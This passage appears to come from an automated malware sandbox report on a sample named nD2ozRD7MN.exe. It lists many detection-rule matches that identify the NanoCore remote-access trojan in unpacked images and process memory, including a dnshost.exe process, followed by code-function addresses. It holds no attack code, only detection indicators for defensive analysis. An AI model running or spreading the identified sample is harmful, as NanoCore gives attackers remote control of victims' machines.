Source: 5.2.nD2ozRD7MN.exe.790e8a4.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.7890000.21.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.7890000.21.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.76e0000.16.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.76e0000.16.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.76e0000.16.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 9.2.nD2ozRD7MN.exe.41295d0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 9.2.nD2ozRD7MN.exe.41295d0.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.nD2ozRD7MN.exe.41295d0.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.nD2ozRD7MN.exe.41295d0.1.unpack, type: UNPACKEDPE	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.nD2ozRD7MN.exe.41295d0.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.45e4e38.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.45e4e38.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.45e4e38.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 9.2.nD2ozRD7MN.exe.41295d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 9.2.nD2ozRD7MN.exe.41295d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.nD2ozRD7MN.exe.41295d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.nD2ozRD7MN.exe.41295d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.nD2ozRD7MN.exe.41295d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.473fe5e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.3456430.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.3435bc4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.3435bc4.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.nD2ozRD7MN.exe.3435bc4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.3435bc4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.33dd044.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.33dd044.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.33dd044.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.473fe5e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.3456430.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.nD2ozRD7MN.exe.3456430.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.3456430.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.nD2ozRD7MN.exe.3c8061c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.473fe5e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.45f36dc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.473702f.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.45f36dc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.3441e00.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.45f36dc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.473702f.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.nD2ozRD7MN.exe.473702f.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.nD2ozRD7MN.exe.3c8061c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.nD2ozRD7MN.exe.3c8061c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.nD2ozRD7MN.exe.473702f.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.nD2ozRD7MN.exe.3441e00.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.nD2ozRD7MN.exe.3441e00.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.nD2ozRD7MN.exe.3441e00.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000005.00000002.3557957967.0000000007880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.3557957967.0000000007880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.3557957967.0000000007880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000005.00000002.3557822095.0000000007860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.3557822095.0000000007860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.3557822095.0000000007860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.3558104090.00000000078A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.3558104090.00000000078A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.3558104090.00000000078A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000005.00000002.3558552439.00000000078F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.3558552439.00000000078F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.3558552439.00000000078F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000005.00000002.3557377899.00000000076D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.3557377899.00000000076D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.3557377899.00000000076D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000005.00000002.3549495564.00000000045E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.3553716195.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.3553716195.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.3553716195.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000005.00000002.3558267406.00000000078C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.3558267406.00000000078C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.3558267406.00000000078C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000005.00000002.3558019588.0000000007890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.3558019588.0000000007890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.3558019588.0000000007890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000005.00000002.3558638769.0000000007900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.3558638769.0000000007900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.3558638769.0000000007900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000005.00000002.3558861975.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.3558861975.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.3558861975.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.3553602529.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.3553602529.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.3553602529.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.3557767120.0000000007850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.3557767120.0000000007850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.3557767120.0000000007850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000005.00000002.3557903252.0000000007870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.3557903252.0000000007870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.3557903252.0000000007870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000C.00000002.2112791881.0000000003C39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000C.00000002.2112791881.0000000003C39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.3557457551.00000000076E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.3557457551.00000000076E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.3557457551.00000000076E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.2112471535.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000C.00000002.2112471535.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000002.2136851578.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000011.00000002.2136851578.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.3543198585.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: nD2ozRD7MN.exe PID: 1892, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: nD2ozRD7MN.exe PID: 1892, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: nD2ozRD7MN.exe PID: 1892, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: nD2ozRD7MN.exe PID: 1892, type: MEMORYSTR	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: nD2ozRD7MN.exe PID: 5016, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: nD2ozRD7MN.exe PID: 5016, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: nD2ozRD7MN.exe PID: 5016, type: MEMORYSTR	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: nD2ozRD7MN.exe PID: 7288, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: nD2ozRD7MN.exe PID: 7288, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: nD2ozRD7MN.exe PID: 7288, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: nD2ozRD7MN.exe PID: 7288, type: MEMORYSTR	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: nD2ozRD7MN.exe PID: 7456, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: nD2ozRD7MN.exe PID: 7456, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: nD2ozRD7MN.exe PID: 7456, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: nD2ozRD7MN.exe PID: 7456, type: MEMORYSTR	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: dnshost.exe PID: 7800, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: dnshost.exe PID: 7800, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_013F3E34	0_2_013F3E34
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_013FE04C	0_2_013FE04C
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_013F703A	0_2_013F703A
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_0553E7F0	0_2_0553E7F0
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_055327A8	0_2_055327A8
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_05532798	0_2_05532798
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_0553CE30	0_2_0553CE30
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_0553CE20	0_2_0553CE20
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_0741AEF8	0_2_0741AEF8
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_074121B0	0_2_074121B0
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_0741B6B8	0_2_0741B6B8
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_074123F0	0_2_074123F0
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_074E2348	0_2_074E2348
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_074E1078	0_2_074E1078
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_074E5602	0_2_074E5602
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_074E4600	0_2_074E4600
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_074E5610	0_2_074E5610
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_074ED428	0_2_074ED428
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_074E2338	0_2_074E2338
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_074EE138	0_2_074EE138
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_074EC188	0_2_074EC188
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_074E1069	0_2_074E1069
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_074EBD38	0_2_074EBD38
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_074EDCEF	0_2_074EDCEF
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_074E580F	0_2_074E580F
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_074E5897	0_2_074E5897
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_074E58A8	0_2_074E58A8
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_07F32106	0_2_07F32106
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_07F3CD54	0_2_07F3CD54
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_07F36CE8	0_2_07F36CE8
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_07F36CD8	0_2_07F36CD8
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_07F32C38	0_2_07F32C38
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_07F38C00	0_2_07F38C00
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_082B3030	0_2_082B3030
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 0_2_082B05B8	0_2_082B05B8
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 5_2_019BD344	5_2_019BD344
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 5_2_078EA7E0	5_2_078EA7E0
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 5_2_078E44F0	5_2_078E44F0
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 5_2_078E2FF8	5_2_078E2FF8
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 5_2_078E9F10	5_2_078E9F10
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 5_2_078EACD1	5_2_078EACD1
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 5_2_078E3C10	5_2_078E3C10
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 5_2_078E5C30	5_2_078E5C30
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 5_2_078E6848	5_2_078E6848
